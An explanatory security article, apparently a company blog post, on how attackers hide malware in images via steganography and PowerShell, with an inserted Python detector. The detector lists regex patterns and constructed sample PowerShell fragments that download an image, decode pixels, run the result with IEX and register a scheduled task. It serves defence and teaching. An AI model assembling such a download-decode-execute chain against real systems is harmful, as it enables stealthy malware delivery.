Steganography is the act of hiding secret information within an ordinary, non-secret file or message to avoid detection. The main strengths of steganography are its capacity to keep a message as secret as possible and hide a large amount of data. Cyber attackers are exploiting these strengths to target organizations by launching sophisticated attacks.
Cyber attackers employ steganography to embed malicious code in seemingly benign content and so bypass an organization’s cyber security. The basic layout of a cyber attack using steganography is based on four concepts:
- Social Engineering: When the user opens the compromised document, the malware code instructs the victim to enable content in the document.
- Network Security Monitoring Evasion: Once the content is enabled, the document runs a PowerShell script to download a file with embedded malware. The file may be as simple as a popular image, a wallpaper, etc. and is stored on a remote server.
- Manual Analysis Evasion: The attackers make use of obfuscated VB macros to decode the malicious content hidden within the pixels of these images and install the malware.
- Persistence: The malware is designed to register scheduled tasks to enable the script to survive system reboots.
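A detection sketch for the chain listed above, added here as an example and not part of the original article: it scans PowerShell script text (for instance, text collected by script block logging) for the image download, pixel decoding, dynamic execution and scheduled-task stages. The indicator patterns, the scoring rule and the sample scripts are constructed assumptions, not a complete rule set.

```python
import re

# Indicators for the stages the article lists (illustrative assumptions).
INDICATORS = {
    "image_download": re.compile(
        r"(Invoke-WebRequest|DownloadFile|DownloadData|OpenRead|Net\.WebClient)"
        r".*\.(png|jpe?g|bmp|gif)\b", re.I | re.S),
    "pixel_decode": re.compile(
        r"System\.Drawing\.Bitmap|\.GetPixel\(|LockBits\(", re.I),
    "dynamic_exec": re.compile(
        r"\bIEX\b|Invoke-Expression|\[ScriptBlock\]::Create", re.I),
    "persistence": re.compile(
        r"Register-ScheduledTask|New-ScheduledTaskAction|schtasks(\.exe)?\s+/create",
        re.I),
}

def classify(script_text):
    """Return (level, matched_stages) for one logged script block."""
    hits = sorted(n for n, rx in INDICATORS.items() if rx.search(script_text))
    # Reading pixels is normal for imaging tools; reading pixels from a
    # downloaded image, or executing what was read, is the suspicious pairing.
    if "pixel_decode" in hits and ("image_download" in hits or "dynamic_exec" in hits):
        return "alert", hits
    if len(hits) >= 2:
        return "review", hits
    return "ok", hits

# Constructed, non-functional script fragments used as sample input.
SAMPLES = {
    "macro_child": (
        "$wc = New-Object Net.WebClient; $bmp = New-Object System.Drawing.Bitmap("
        "$wc.OpenRead('https://img.example.invalid/wallpaper.png')); "
        "<# loop elided #> $p = $bmp.GetPixel($x, $y); IEX $decoded; "
        "Register-ScheduledTask -TaskName 'Updater' -Action $a -Trigger $t"),
    "admin_task": "Register-ScheduledTask -TaskName 'NightlyBackup' -Action $a -Trigger $t",
    "thumbnailer": "$bmp = New-Object System.Drawing.Bitmap('photo.jpg'); "
                   "$bmp.GetThumbnailImage(64, 64, $null, 0)",
    "download_and_task": "Invoke-WebRequest https://cdn.example.invalid/logo.png "
                         "-OutFile logo.png; schtasks /create /tn Sync /tr sync.cmd /sc daily",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        level, hits = classify(text)
        print(f"{name:18} {level:7} {', '.join(hits)}")
```

Routine administration and image handling each match a single indicator and stay at "ok"; only the combination of stages raises the level.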
What Is PowerShell?
Microsoft introduced PowerShell as a scripting language and command-line shell. It is now open-source and cross-platform, enabling developers to use multiple languages and libraries for building applications for mobile, gaming, desktop, and IoT solutions. It is popular among cyber criminals for launching steganography attacks because:
- It’s easy to use and versatile, providing access to all major OS functions.
- It is used and trusted by many administrators, allowing PowerShell malware to blend in with benign activity on the network.
What Type Of Information Is Hidden Via Steganography By Cyber Criminals?
Cyber criminals can use information hiding at different stages of a cyber attack, depending on the kind of information hidden.
- Identities: Anonymization techniques are used to hide the identities of communicating parties.
- Communication: Steganography is used to hide the fact that a conversation is taking place. It conceals the data packet flow by using traffic-type obfuscation methods.
- Content: Cyber criminals may hide the content of data but not the transmission or presence of data itself.
- Code: The structure of executable malicious code is hidden by binary code obfuscation and masquerading techniques.
With the increase in the number of sophisticated cyber attacks using steganographic techniques, organizations are required to update their cyber security measures.
For more information on the use of steganography in cyber attacks, contact Centex Technologies at (254) 213 – 4740.